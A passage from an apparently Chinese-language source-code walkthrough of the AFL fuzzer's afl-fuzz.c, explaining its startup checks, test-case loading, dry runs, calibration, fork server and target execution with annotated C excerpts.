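        if (cur && (cur & vir)) {
            if (ret < 2)
                ret = (vir == 0xff) ? 2 : 1;   /* 0xff means this edge was still untouched */
            virgin_map[i] &= (uint8_t)~cur;    /* remember that it has now been seen */
        }
    }
    return ret;
}

The same check is run against virgin_bits for normal executions and against virgin_tmout / virgin_crash when deciding whether a hang or crash is worth keeping, which is exactly how the three bitmaps declared at the top of afl-fuzz.c are consumed.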
在完成参数的解析后, 开始设置对应的信号处理的handle, 这一部分将在之后进行分析 1setup_signal_handlers(); 以及检查ASAN参数 1check_asan_opts(); 然后开始对应环境变量的解析 123456789101112131415161718192021222324252627282930313233if (sync_id) fix_up_sync();if (!strcmp(in_dir, out_dir)) FATAL("Input and output directories can't be the same");if (dumb_mode) { if (crash_mode) FATAL("-C and -n are mutually exclusive"); if (qemu_mode) FATAL("-Q and -n are mutually exclusive");}if (getenv("AFL_NO_FORKSRV")) no_forkserver = 1;if (getenv("AFL_NO_CPU_RED")) no_cpu_meter_red = 1;if (getenv("AFL_NO_ARITH")) no_arith = 1;if (getenv("AFL_SHUFFLE_QUEUE")) shuffle_queue = 1;if (getenv("AFL_FAST_CAL")) fast_cal = 1;if (getenv("AFL_HANG_TMOUT")) { hang_tmout = atoi(getenv("AFL_HANG_TMOUT")); if (!hang_tmout) FATAL("Invalid value of AFL_HANG_TMOUT");}if (dumb_mode == 2 && no_forkserver) FATAL("AFL_DUMB_FORKSRV and AFL_NO_FORKSRV are mutually exclusive");if (getenv("AFL_PRELOAD")) { setenv("LD_PRELOAD", getenv("AFL_PRELOAD"), 1); setenv("DYLD_INSERT_LIBRARIES", getenv("AFL_PRELOAD"), 1);}if (getenv("AFL_LD_PRELOAD")) FATAL("Use AFL_PRELOAD instead of AFL_LD_PRELOAD"); 对于此处涉及到的环境变量将在后面一一说明 接下来将原来的命令行参数保存起来 1save_cmdline(argc, argv); 设置用户态banner 1fix_up_banner(argv[optind]); 检查是否在tty模式下运行 1check_if_tty(); 获取核心数 1get_core_count(); 如果设置了 AFFINITY 123#ifdef HAVE_AFFINITY bind_to_free_cpu();#endif /* HAVE_AFFINITY */ 然后是一些对于机器和架构的检查 12check_crash_handling();check_cpu_governor(); 设置postprocessor 1setup_post(); 设置共享内存用于消息的传递 1setup_shm(); 对于class16数据进行分类 1init_count_class16(); 为输出文件设置dir以及fd 1setup_dirs_fds(); 读取初始测试用例 12read_testcases();load_auto(); 对输入目录进行一些处理 1pivot_inputs(); 接下来又是一连串的处理 123456789101112131415161718if (extras_dir) load_extras(extras_dir);// 如果设置了extras,那么加载extras// 类似于字典if (!timeout_given) find_timeout();// 如果设置了timeout,设置给定timeoutdetect_file_args(argv + optind + 1);// 检查运行参数,找到@@if (!out_file) setup_stdio_file();// 设置输出文件check_binary(argv[optind]);// 检查目标程序start_time = get_cur_time();// 设置起始时间if (qemu_mode)// 如果使用了qemu_mode use_argv = get_qemu_argv(argv[0], argv + optind, argc - optind);else use_argv = argv + optind; 对于输入进行试运行,确保所有输入符合预期 接下来cull_queue,在之后继续分析 1cull_queue(); 1234show_init_stats();// 输出初始状态seek_to = find_start_position();// 针对resume状态而言,快速回复到终止位置 1234write_stats_file(0, 0, 0);// 将初始状态保存在stat文件中save_auto();// 保存自动生成的extras 接下来是针对stop的处理 12345678if (stop_soon) goto stop_fuzzing;if (!not_on_tty) { sleep(4); start_time += 4000; if (stop_soon) goto stop_fuzzing;} 然后正式进入fuzz循环 在循环前还要cull_queue 一次 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960 while (1) { u8 skipped_fuzz; cull_queue();// 再次进行cull_queue 操作 if (!queue_cur) { queue_cycle++; current_entry = 0; cur_skipped_paths = 0; queue_cur = queue; while (seek_to) { current_entry++; seek_to--; queue_cur = queue_cur->next; } // 当存在seek_to时,直接跳到对应的testcase show_stats(); if (not_on_tty) { ACTF("Entering queue cycle %llu.", queue_cycle); fflush(stdout); } /* If we had a full queue cycle with no new finds, try recombination strategies next. 
*/ if (queued_paths == prev_queued) { if (use_splicing) cycles_wo_finds++; else use_splicing = 1; } else cycles_wo_finds = 0; prev_queued = queued_paths; if (sync_id && queue_cycle == 1 && getenv("AFL_IMPORT_FIRST")) sync_fuzzers(use_argv); } skipped_fuzz = fuzz_one(use_argv);// 运行一次fuzz,并完成种子的变异阶段 if (!stop_soon && sync_id && !skipped_fuzz) { if (!(sync_interval_cnt++ % SYNC_INTERVAL)) sync_fuzzers(use_argv); } if (!stop_soon && exit_1) stop_soon = 2; if (stop_soon) break; queue_cur = queue_cur->next; current_entry++; // 测试下一个种子 } setup_shm | 基于共享内存的消息传递 这里是和fuzz对象子进程对应的设置共享内存,用来传递bitmap 12345678910111213141516171819202122232425262728293031EXP_ST void setup_shm(void) { u8* shm_str; if (!in_bitmap) memset(virgin_bits, 255, MAP_SIZE); memset(virgin_tmout, 255, MAP_SIZE); memset(virgin_crash, 255, MAP_SIZE); shm_id = shmget(IPC_PRIVATE, MAP_SIZE, IPC_CREAT | IPC_EXCL | 0600); if (shm_id < 0) PFATAL("shmget() failed"); atexit(remove_shm); shm_str = alloc_printf("%d", shm_id); /* If somebody is asking us to fuzz instrumented binaries in dumb mode, we don't want them to detect instrumentation, since we won't be sending fork server commands. This should be replaced with better auto-detection later on, perhaps? */ if (!dumb_mode) setenv(SHM_ENV_VAR, shm_str, 1); ck_free(shm_str); trace_bits = shmat(shm_id, NULL, 0); if (trace_bits == (void *)-1) PFATAL("shmat() failed");} 这里直接创建一个共享内存,同子进程forkserver中 __afl_global_area 指向的区域进行共享 对于testcase的预处理 主要包含三个函数: read_testcase: 从文件中读取testcases perform_dry_run: 对于testcase的试运行 cull_queue: 挑选更好的种子 read_testcases | 读取testcase 用来从文件中读取testcase 首先创建了一些局部变量 1234struct dirent **nl;s32 nl_cnt;u32 i;u8* fn; 找到queue文件夹: 1234fn = alloc_printf("%s/queue", in_dir);if (!access(fn, F_OK)) in_dir = fn; else ck_free(fn);ACTF("Scanning '%s'...", in_dir); 通过scandir获取字母序的目录文件 1nl_cnt = scandir(in_dir, &nl, NULL, alphasort); 如果设置了shullle_queue,并且queue数量大于1,那就打乱此nl数组 12345if (shuffle_queue && nl_cnt > 1) { ACTF("Shuffling queue..."); shuffle_ptrs((void**)nl, nl_cnt);} shuffle的逻辑也很简单,就是进行n次的随机交换 1234567891011121314static void shuffle_ptrs(void** ptrs, u32 cnt) { u32 i; for (i = 0; i < cnt - 2; i++) { u32 j = i + UR(cnt - i); void *s = ptrs[i]; ptrs[i] = ptrs[j]; ptrs[j] = s; }} 接下来是一个大循环,用来对于testcase一个个进行初始化 12345678910111213141516171819202122232425262728293031323334353637383940414243 for (i = 0; i < nl_cnt; i++) { struct stat st; u8* fn = alloc_printf("%s/%s", in_dir, nl[i]->d_name); u8* dfn = alloc_printf("%s/.state/deterministic_done/%s", in_dir, nl[i]->d_name); // 首先找到两个对应文件 u8 passed_det = 0; free(nl[i]); /* not tracked */ // 然后释放文件nl对象内存 if (lstat(fn, &st) || access(fn, R_OK)) PFATAL("Unable to access '%s'", fn);// 判断是否可以存在相应文件 /* This also takes care of . and .. */ if (!S_ISREG(st.st_mode) || !st.st_size || strstr(fn, "/README.testcases")) { // 剔除 "."、".." 和 README.testcases // 以及空文件 等无效文件 ck_free(fn); ck_free(dfn); continue; } if (st.st_size > MAX_FILE) FATAL("Test case '%s' is too big (%s, limit is %s)", fn, DMS(st.st_size), DMS(MAX_FILE)); // 如果testcase太大 /* Check for metadata that indicates that deterministic fuzzing is complete for this entry. We don't want to repeat deterministic fuzzing when resuming aborted scans, because it would be pointless and probably very time-consuming. 
*/ // 通过是否存在deterministic_done文件,来判断是否是resuming // 如果是resume,则跳过deterministic fuzz 阶段 if (!access(dfn, F_OK)) passed_det = 1; ck_free(dfn); // 将testcase添加进queue add_to_queue(fn, st.st_size, passed_det); } 最后是收尾的一些处理: 12345678910111213141516free(nl); /* not tracked */if (!queued_paths){ SAYF("\\n" cLRD "[-] " cRST "Looks like there are no valid test cases in the input directory! The fuzzer\\n" " needs one or more test case to start with - ideally, a small file under\\n" " 1 kB or so. The cases must be stored as regular files directly in the\\n" " input directory.\\n"); FATAL("No usable test cases in '%s'", in_dir);}last_path_time = 0;queued_at_start = queued_paths; add_to_queue 通过add_to_queue 将testcase加入queue 12345678910111213141516171819202122232425262728293031323334353637static void add_to_queue(u8* fname, u32 len, u8 passed_det) { struct queue_entry* q = ck_alloc(sizeof(struct queue_entry)); q->fname = fname; q->len = len; q->depth = cur_depth + 1; q->passed_det = passed_det; // 设置queue的各个成员信息 if (q->depth > max_depth) max_depth = q->depth; if (queue_top) { queue_top->next = q; queue_top = q; } else q_prev100 = queue = queue_top = q; // 将此queue_entry加入队列 // 将此queue_entry放入queue_top queued_paths++; // 增加queue路径 pending_not_fuzzed++; // 增加等待fuzz 计数 cycles_wo_finds = 0; /* Set next_100 pointer for every 100th element (index 0, 100, etc) to allow faster iteration. */ if ((queued_paths - 1) % 100 == 0 && queued_paths > 1) { // q_prev100 是一个相对于普通queue间隔100的queue, // 用来快速访问 q_prev100->next_100 = q; q_prev100 = q; } last_path_time = get_cur_time();} 其中最核心的部分就是设置了两个queue perform_dry_run | 对于testcase的试运行 此函数会遍历queue中的每个个体,然后对于对应的testcase进行一下试运行,并根据运行结果先筛选出不合适的testcase。 首先创建了一些局部变量 123struct queue_entry *q = queue;u32 cal_failures = 0;u8 *skip_crashes = getenv("AFL_SKIP_CRASHES"); 然后进入了一个循环 循环的开始是通过queue的文件名读取了输入用例 123456789101112131415161718192021while (q){ u8 *use_mem; u8 res; s32 fd; u8 *fn = strrchr(q->fname, '/') + 1; ACTF("Attempting dry run with '%s'...", fn); fd = open(q->fname, O_RDONLY); if (fd < 0) PFATAL("Unable to open '%s'", q->fname); use_mem = ck_alloc_nozero(q->len); if (read(fd, use_mem, q->len) != q->len) FATAL("Short read from '%s'", q->fname); close(fd); 然后通过 calibrate_case 对testcase进行了处理并尝试运行 12res = calibrate_case(argv, q, use_mem, 0, 1);ck_free(use_mem); 根据运行结果进行相应错误处理 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153 if (res == crash_mode || res == FAULT_NOBITS) SAYF(cGRA " len = %u, map size = %u, exec speed = %llu us\\n" cRST, q->len, q->bitmap_size, q->exec_us); switch (res) { case FAULT_NONE: // 如果没有错误,并且是queue的第一个testcase if (q == queue) check_map_coverage(); if (crash_mode) FATAL("Test case '%s' does *NOT* crash", fn); break; case FAULT_TMOUT: if (timeout_given) { /* The -t nn+ syntax in the command line sets timeout_given to '2' and instructs afl-fuzz to tolerate but skip queue entries that time out. */ if (timeout_given > 1) { WARNF("Test case results in a timeout (skipping)"); q->cal_failed = CAL_CHANCES; cal_failures++; break; } SAYF("\\n" cLRD "[-] " cRST "The program took more than %u ms to process one of the initial test cases.\\n" " Usually, the right thing to do is to relax the -t option - or to delete it\\n" " altogether and allow the fuzzer to auto-calibrate. 
That said, if you know\\n" " what you are doing and want to simply skip the unruly test cases, append\\n" " '+' at the end of the value passed to -t ('-t %u+').\\n", exec_tmout, exec_tmout); FATAL("Test case '%s' results in a timeout", fn); } else { SAYF("\\n" cLRD "[-] " cRST "The program took more than %u ms to process one of the initial test cases.\\n" " This is bad news; raising the limit with the -t option is possible, but\\n" " will probably make the fuzzing process extremely slow.\\n\\n" " If this test case is just a fluke, the other option is to just avoid it\\n" " altogether, and find one that is less of a CPU hog.\\n", exec_tmout); FATAL("Test case '%s' results in a timeout", fn); } case FAULT_CRASH: if (crash_mode) break; if (skip_crashes) { WARNF("Test case results in a crash (skipping)"); q->cal_failed = CAL_CHANCES; cal_failures++; break; } if (mem_limit) { SAYF("\\n" cLRD "[-] " cRST "Oops, the program crashed with one of the test cases provided. There are\\n" " several possible explanations:\\n\\n" " - The test case causes known crashes under normal working conditions. If\\n" " so, please remove it. The fuzzer should be seeded with interesting\\n" " inputs - but not ones that cause an outright crash.\\n\\n" " - The current memory limit (%s) is too low for this program, causing\\n" " it to die due to OOM when parsing valid files. To fix this, try\\n" " bumping it up with the -m setting in the command line. If in doubt,\\n" " try something along the lines of:\\n\\n"#ifdef RLIMIT_AS " ( ulimit -Sv $[%llu << 10]; /path/to/binary [...] <testcase )\\n\\n"#else " ( ulimit -Sd $[%llu << 10]; /path/to/binary [...] <testcase )\\n\\n"#endif /* ^RLIMIT_AS */ " Tip: you can use http://jwilk.net/software/recidivm to quickly\\n" " estimate the required amount of virtual memory for the binary. Also,\\n" " if you are using ASAN, see %s/notes_for_asan.txt.\\n\\n"#ifdef __APPLE__ " - On MacOS X, the semantics of fork() syscalls are non-standard and may\\n" " break afl-fuzz performance optimizations when running platform-specific\\n" " binaries. To fix this, set AFL_NO_FORKSRV=1 in the environment.\\n\\n"#endif /* __APPLE__ */ " - Least likely, there is a horrible bug in the fuzzer. If other options\\n" " fail, poke <[email protected]> for troubleshooting tips.\\n", DMS(mem_limit << 20), mem_limit - 1, doc_path); } else { SAYF("\\n" cLRD "[-] " cRST "Oops, the program crashed with one of the test cases provided. There are\\n" " several possible explanations:\\n\\n" " - The test case causes known crashes under normal working conditions. If\\n" " so, please remove it. The fuzzer should be seeded with interesting\\n" " inputs - but not ones that cause an outright crash.\\n\\n"#ifdef __APPLE__ " - On MacOS X, the semantics of fork() syscalls are non-standard and may\\n" " break afl-fuzz performance optimizations when running platform-specific\\n" " binaries. To fix this, set AFL_NO_FORKSRV=1 in the environment.\\n\\n"#endif /* __APPLE__ */ " - Least likely, there is a horrible bug in the fuzzer. 
If other options\\n" " fail, poke <[email protected]> for troubleshooting tips.\\n"); } FATAL("Test case '%s' results in a crash", fn); case FAULT_ERROR: FATAL("Unable to execute target application ('%s')", argv[0]); case FAULT_NOINST: FATAL("No instrumentation detected"); case FAULT_NOBITS: useless_at_start++; if (!in_bitmap && !shuffle_queue) WARNF("No new instrumentation output, test case may be useless."); break; } 结束了循环 最后进行了错误处理 12345678910111213141516if (cal_failures){ if (cal_failures == queued_paths) FATAL("All test cases time out%s, giving up!", skip_crashes ? " or crash" : ""); WARNF("Skipped %u test cases (%0.02f%%) due to timeouts%s.", cal_failures, ((double)cal_failures) * 100 / queued_paths, skip_crashes ? " or crashes" : ""); if (cal_failures * 5 > queued_paths) WARNF(cLRD "High percentage of rejected test cases, check settings!");}OKF("All test cases processed."); calibrate_case 用来运行一次fuzz目标程序,并且记录fuzz运行的结果,用来校准对应的testcase 首先创建了一些局部变量 1234567891011121314static u8 calibrate_case(char **argv, struct queue_entry *q, u8 *use_mem, u32 handicap, u8 from_queue){ static u8 first_trace[MAP_SIZE]; u8 fault = 0, new_bits = 0, var_detected = 0, hnb = 0, first_run = (q->exec_cksum == 0); u64 start_us, stop_us; s32 old_sc = stage_cur, old_sm = stage_max; u32 use_tmout = exec_tmout; u8 *old_sn = stage_name; 然后判断testcase时是否来自queue,或者是否是resume一个fuzz job,也即,是否是一个已经运行过一次的fuzz,然后再接着运行,如果是,则更新use_tmout 1234if (!from_queue || resuming_fuzz) use_tmout = MAX(exec_tmout + CAL_TMOUT_ADD, exec_tmout * CAL_TMOUT_PERC / 100); // 提升tmout的值 更新cal_failed 的值 1q->cal_failed++; 1234stage_name = "calibration";// 更新stage_name stage_max = fast_cal ? 3 : CAL_CYCLES;// 设置cal的最大论数,如果需要fast_cal则设置最大3论 确保没有forkserver并且非dump_mode时,创建一个forkserver 12if (dumb_mode != 1 && !no_forkserver && !forksrv_pid) init_forkserver(argv); 什么是dump_mode呢? dump_mode即没有插桩和确定性(deterministic)变异阶段的模式 q->exec_cksum 初始时为0,因此此处是用来判断是否是初次运行 virgin_bits是一个bitmap,用来记录没有触及的block 12345678910if (q->exec_cksum){ // 如果不是初次运行 memcpy(first_trace, trace_bits, MAP_SIZE); hnb = has_new_bits(virgin_bits); if (hnb > new_bits) new_bits = hnb; // 更新new_bits数} 设置起始时间 1start_us = get_cur_time_us(); 接下来进入循环轮次: 这里的可变分支,指的是,对于同样的输入,可能可以到达也可能不能到达的分支。 在循环中,通过 run_target 真正让目标程序开始运行, 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263 for (stage_cur = 0; stage_cur < stage_max; stage_cur++) {// 循环轮次由前面的代码确定 u32 cksum; if (!first_run && !(stage_cur % stats_update_freq)) show_stats(); // 如果不是第一次运行 并且state_cur 隔 stats_update_freq 次 // 则show_stats write_to_testcase(use_mem, q->len); // 将testcase写入out_file fault = run_target(argv, use_tmout); // 运行目标程序 /* stop_soon is set by the handler for Ctrl+C. When it's pressed, we want to bail out quickly. 
*/ if (stop_soon || fault != crash_mode) goto abort_calibration; // 如果收到终止signal if (!dumb_mode && !stage_cur && !count_bytes(trace_bits)) { fault = FAULT_NOINST; goto abort_calibration; } cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST); // 计算bitmap的hash if (q->exec_cksum != cksum) { // bitmap发生变化 // 一般在第一次运行,或者在同样的参数下,分支可变的情形 hnb = has_new_bits(virgin_bits); // 计算virgin_bits的更新 if (hnb > new_bits) new_bits = hnb; if (q->exec_cksum) { // 如果是分支可变的情形 u32 i; for (i = 0; i < MAP_SIZE; i++) { // 循环遍历,找到可变的region,如果找到了,就延长轮次 // 以便进行更多的遍历 if (!var_bytes[i] && first_trace[i] != trace_bits[i]) { var_bytes[i] = 1; stage_max = CAL_CYCLES_LONG; } } var_detected = 1; // 检测到可变 } else { // 如果是第一次运行 q->exec_cksum = cksum; memcpy(first_trace, trace_bits, MAP_SIZE); } } } 增加总运行时间和轮次计算 1234stop_us = get_cur_time_us();total_cal_us += stop_us - start_us;total_cal_cycles += stage_max; 更新queue的相关成员 123456q->exec_us = (stop_us - start_us) / stage_max;// 平均每轮的执行时间q->bitmap_size = count_bytes(trace_bits);q->handicap = handicap;q->cal_failed = 0;// 将之前的设置的1还原为0,表示没有失败 还需要用 update_bitmap_score 更新bitmap的分数 1234total_bitmap_size += q->bitmap_size;total_bitmap_entries++;update_bitmap_score(q); 如果没有产生新bit 12if (!dumb_mode && first_run && !fault && !new_bits) fault = FAULT_NOBITS; 进入最后的收尾的处理阶段 123456789101112131415161718192021222324252627282930313233343536abort_calibration: if (new_bits == 2 && !q->has_new_cov) { // has_new_bits在存在new bit下的返回值就是2 q->has_new_cov = 1; // 有新的覆盖率 queued_with_cov++; // 有新覆盖率的queue加一 } /* Mark variable paths. */ if (var_detected) { // 计算可变bytes的数量 var_byte_count = count_bytes(var_bytes); if (!q->var_behavior) { // 如果可变 mark_as_variable(q); // 通过创建一个variable_behavior文件标记其可变 queued_variable++; } } // 恢复之前的stage相关的全局变量 stage_name = old_sn; stage_cur = old_sc; stage_max = old_sm; if (!first_run) show_stats(); return fault;} init_forkserver 用来创建一个forkserver,避免频繁的execve 首先创建两个管道,st_pipe 和 ctl_pipe , 分别用于传递状态和命令 123456789101112EXP_ST void init_forkserver(char **argv){ static struct itimerval it; int st_pipe[2], ctl_pipe[2]; int status; s32 rlen; ACTF("Spinning up the fork server..."); if (pipe(st_pipe) || pipe(ctl_pipe)) PFATAL("pipe() failed"); 接下来通过fork产生一个子进程,父进程是fuzzer,子进程是forkserver 123forksrv_pid = fork(); if (forksrv_pid < 0) PFATAL("fork() failed"); 通过pid控制子进程进入如下if语句 1234567891011121314151617181920212223 if (!forksrv_pid) { // 省略部分对于openbsd的特殊处理 setsid(); // 通过setsid使得子进程成为一个单独进程组 dup2(dev_null_fd, 1); dup2(dev_null_fd, 2); // 将标准输出和标准错误重定向到/dev/null // 如果没有设置输出文件 // 将标准输入重定向到此文件// 此处笔者还没有搞清楚为什么 if (out_file) { dup2(dev_null_fd, 0); } else { dup2(out_fd, 0); close(out_fd); } 接下来设置状态和控制管道的文件描述符 1234if (dup2(ctl_pipe[0], FORKSRV_FD) < 0) PFATAL("dup2() failed");if (dup2(st_pipe[1], FORKSRV_FD + 1) < 0) PFATAL("dup2() failed"); 关闭多余描述符 123456789close(ctl_pipe[0]);close(ctl_pipe[1]);close(st_pipe[0]);close(st_pipe[1]);close(out_dir_fd);close(dev_null_fd);close(dev_urandom_fd);close(fileno(plot_file)); 设置延迟绑定 12if (!getenv("LD_BIND_LAZY")) setenv("LD_BIND_NOW", "1", 0); 设置ASAN相关环境变量 12345setenv("ASAN_OPTIONS", "abort_on_error=1:" "detect_leaks=0:" "symbolize=0:" "allocator_may_return_null=1", 0); 设置MSAN相关环境变量 123456setenv("MSAN_OPTIONS", "exit_code=" STRINGIFY(MSAN_ERROR) ":" "symbolize=0:" "abort_on_error=1:" "allocator_may_return_null=1:" "msan_track_origins=0", 0); 通过execv执行子进程 1execv(target_path, argv); 此时之后目标程序的运行空间会覆盖当前运行时 如果execv失败,通知父进程 123 *(u32 *)trace_bits = EXEC_FAIL_SIG; exit(0);} 子进程if结束 父进程通过状态管道读取四个字节,来判断子进程的开始,并针对性完成错误处理 
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162 close(ctl_pipe[0]); close(st_pipe[1]); fsrv_ctl_fd = ctl_pipe[1]; fsrv_st_fd = st_pipe[0]; /* Wait for the fork server to come up, but don't wait too long. */ it.it_value.tv_sec = ((exec_tmout * FORK_WAIT_MULT) / 1000); it.it_value.tv_usec = ((exec_tmout * FORK_WAIT_MULT) % 1000) * 1000; setitimer(ITIMER_REAL, &it, NULL); rlen = read(fsrv_st_fd, &status, 4); it.it_value.tv_sec = 0; it.it_value.tv_usec = 0; setitimer(ITIMER_REAL, &it, NULL); /* If we have a four-byte "hello" message from the server, we're all set. Otherwise, try to figure out what went wrong. */ if (rlen == 4) { OKF("All right - fork server is up."); return; } if (child_timed_out) FATAL("Timeout while initializing fork server (adjusting -t may help)"); if (waitpid(forksrv_pid, &status, 0) <= 0) PFATAL("waitpid() failed"); if (WIFSIGNALED(status)) { if (mem_limit && mem_limit < 500 && uses_asan) { SAYF("\\n" cLRD "[-] " cRST "Whoops, the target binary crashed suddenly, before receiving any input\\n" " from the fuzzer! Since it seems to be built with ASAN and you have a\\n" " restrictive memory limit configured, this is expected; please read\\n" " %s/notes_for_asan.txt for help.\\n", doc_path); } else if (!mem_limit) { SAYF("\\n" cLRD "[-] " cRST "Whoops, the target binary crashed suddenly, before receiving any input\\n" " from the fuzzer! There are several probable explanations:\\n\\n" " - The binary is just buggy and explodes entirely on its own. If so, you\\n" " need to fix the underlying problem or find a better replacement.\\n\\n"#ifdef __APPLE__ " - On MacOS X, the semantics of fork() syscalls are non-standard and may\\n" " break afl-fuzz performance optimizations when running platform-specific\\n" " targets. To fix this, set AFL_NO_FORKSRV=1 in the environment.\\n\\n"#endif /* __APPLE__ */ " - Less likely, there is a horrible bug in the fuzzer. If other options\\n" " fail, poke <[email protected]> for troubleshooting tips.\\n"); } else { SAYF("\\n" cLRD "[-] " cRST "Whoops, the target binary crashed suddenly, before receiving any input\\n" " from the fuzzer! There are several probable explanations:\\n\\n" " - The current memory limit (%s) is too restrictive, causing the\\n" " target to hit an OOM condition in the dynamic linker. Try bumping up\\n" " the limit with the -m setting in the command line. A simple way confirm\\n" " this diagnosis would be:\\n\\n"#ifdef RLIMIT_AS " ( ulimit -Sv $[%llu << 10]; /path/to/fuzzed_app )\\n\\n"#else " ( ulimit -Sd $[%llu << 10]; /path/to/fuzzed_app )\\n\\n"#endif /* ^RLIMIT_AS */ " Tip: you can use http://jwilk.net/software/recidivm to quickly\\n" " estimate the required amount of virtual memory for the binary.\\n\\n" " - The binary is just buggy and explodes entirely on its own. If so, you\\n" " need to fix the underlying problem or find a better replacement.\\n\\n"#ifdef __APPLE__ " - On MacOS X, the semantics of fork() syscalls are non-standard and may\\n" " break afl-fuzz performance optimizations when running platform-specific\\n" " targets. To fix this, set AFL_NO_FORKSRV=1 in the environment.\\n\\n"#endif /* __APPLE__ */ " - Less likely, there is a horrible bug in the fuzzer. 
If other options\\n" " fail, poke <[email protected]> for troubleshooting tips.\\n", DMS(mem_limit << 20), mem_limit - 1); } FATAL("Fork server crashed with signal %d", WTERMSIG(status)); } if (*(u32 *)trace_bits == EXEC_FAIL_SIG) FATAL("Unable to execute target application ('%s')", argv[0]); if (mem_limit && mem_limit < 500 && uses_asan) { SAYF("\\n" cLRD "[-] " cRST "Hmm, looks like the target binary terminated before we could complete a\\n" " handshake with the injected code. Since it seems to be built with ASAN and\\n" " you have a restrictive memory limit configured, this is expected; please\\n" " read %s/notes_for_asan.txt for help.\\n", doc_path); } else if (!mem_limit) { SAYF("\\n" cLRD "[-] " cRST "Hmm, looks like the target binary terminated before we could complete a\\n" " handshake with the injected code. Perhaps there is a horrible bug in the\\n" " fuzzer. Poke <[email protected]> for troubleshooting tips.\\n"); } else { SAYF("\\n" cLRD "[-] " cRST "Hmm, looks like the target binary terminated before we could complete a\\n" " handshake with the injected code. There are %s probable explanations:\\n\\n" "%s" " - The current memory limit (%s) is too restrictive, causing an OOM\\n" " fault in the dynamic linker. This can be fixed with the -m option. A\\n" " simple way to confirm the diagnosis may be:\\n\\n"#ifdef RLIMIT_AS " ( ulimit -Sv $[%llu << 10]; /path/to/fuzzed_app )\\n\\n"#else " ( ulimit -Sd $[%llu << 10]; /path/to/fuzzed_app )\\n\\n"#endif /* ^RLIMIT_AS */ " Tip: you can use http://jwilk.net/software/recidivm to quickly\\n" " estimate the required amount of virtual memory for the binary.\\n\\n" " - Less likely, there is a horrible bug in the fuzzer. If other options\\n" " fail, poke <[email protected]> for troubleshooting tips.\\n", getenv(DEFER_ENV_VAR) ? "three" : "two", getenv(DEFER_ENV_VAR) ? " - You are using deferred forkserver, but __AFL_INIT() is never\\n" " reached before the program terminates.\\n\\n" : "", DMS(mem_limit << 20), mem_limit - 1); } FATAL("Fork server handshake failed");} run_target 用来运行一次目标 首先初始化了trace_bits,并设置了内存屏障 123456789101112131415161718static u8 run_target(char **argv, u32 timeout){ static struct itimerval it; static u32 prev_timed_out = 0; static u64 exec_ms = 0; int status = 0; u32 tb4; child_timed_out = 0; /* After this memset, trace_bits[] are effectively volatile, so we must prevent any earlier operations from venturing into that territory. */ memset(trace_bits, 0, MAP_SIZE); MEM_BARRIER(); 如果是dump_mode 并且没有forkserver, 就需要先类似init_forkserver 中的部分操作,来创建子进程 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182 if (dumb_mode == 1 || no_forkserver) { child_pid = fork(); if (child_pid < 0) PFATAL("fork() failed"); if (!child_pid) { struct rlimit r; if (mem_limit) { r.rlim_max = r.rlim_cur = ((rlim_t)mem_limit) << 20;#ifdef RLIMIT_AS setrlimit(RLIMIT_AS, &r); /* Ignore errors */#else setrlimit(RLIMIT_DATA, &r); /* Ignore errors */#endif /* ^RLIMIT_AS */ } r.rlim_max = r.rlim_cur = 0; setrlimit(RLIMIT_CORE, &r); /* Ignore errors */ /* Isolate the process and configure standard descriptors. If out_file is specified, stdin is /dev/null; otherwise, out_fd is cloned instead. */ setsid(); dup2(dev_null_fd, 1); dup2(dev_null_fd, 2); if (out_file) { dup2(dev_null_fd, 0); } else { dup2(out_fd, 0); close(out_fd); } /* On Linux, would be faster to use O_CLOEXEC. Maybe TODO. 
*/ close(dev_null_fd); close(out_dir_fd); close(dev_urandom_fd); close(fileno(plot_file)); /* Set sane defaults for ASAN if nothing else specified. */ setenv("ASAN_OPTIONS", "abort_on_error=1:" "detect_leaks=0:" "symbolize=0:" "allocator_may_return_null=1", 0); setenv("MSAN_OPTIONS", "exit_code=" STRINGIFY(MSAN_ERROR) ":" "symbolize=0:" "msan_track_origins=0", 0); execv(target_path, argv); /* Use a distinctive bitmap value to tell the parent about execv() falling through. */ *(u32 *)trace_bits = EXEC_FAIL_SIG; exit(0); } } 反之如果在 非dump mode,那么通过控制管道通知子进程运行,并获取其pid 123456789101112131415161718192021222324252627 else { s32 res; /* In non-dumb mode, we have the fork server up and running, so simply tell it to have at it, and then read back PID. */ if ((res = write(fsrv_ctl_fd, &prev_timed_out, 4)) != 4) { // 向forkserver发送消息 if (stop_soon) return 0; RPFATAL(res, "Unable to request new process from fork server (OOM?)"); } if ((res = read(fsrv_st_fd, &child_pid, 4)) != 4) {// 接受子进程pid if (stop_soon) return 0; RPFATAL(res, "Unable to request new process from fork server (OOM?)"); } if (child_pid <= 0) FATAL("Fork server is misbehaving (OOM?)"); } 设置timeout 1234it.it_value.tv_sec = (timeout / 1000);it.it_value.tv_usec = (timeout % 1000) * 1000;setitimer(ITIMER_REAL, &it, NULL); 阻塞,等待子进程运行结束 1234567891011121314151617181920 if (dumb_mode == 1 || no_forkserver) {// 如果在dumpmode,通过waitpid阻塞 if (waitpid(child_pid, &status, 0) <= 0) PFATAL("waitpid() failed"); } else { s32 res; // 如果存在forkserver // 通过读管道阻塞 if ((res = read(fsrv_st_fd, &status, 4)) != 4) { if (stop_soon) return 0; RPFATAL(res, "Unable to communicate with fork server (OOM?)"); } } 接下来根据子进程返回的status,进行对应的错误处理 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465 if (!WIFSTOPPED(status)) child_pid = 0; getitimer(ITIMER_REAL, &it); exec_ms = (u64)timeout - (it.it_value.tv_sec * 1000 + it.it_value.tv_usec / 1000); // 计算运行时间 it.it_value.tv_sec = 0; it.it_value.tv_usec = 0; setitimer(ITIMER_REAL, &it, NULL); total_execs++; // 总运行次数加一 /* Any subsequent operations on trace_bits must not be moved by the compiler below this point. Past this location, trace_bits[] behave 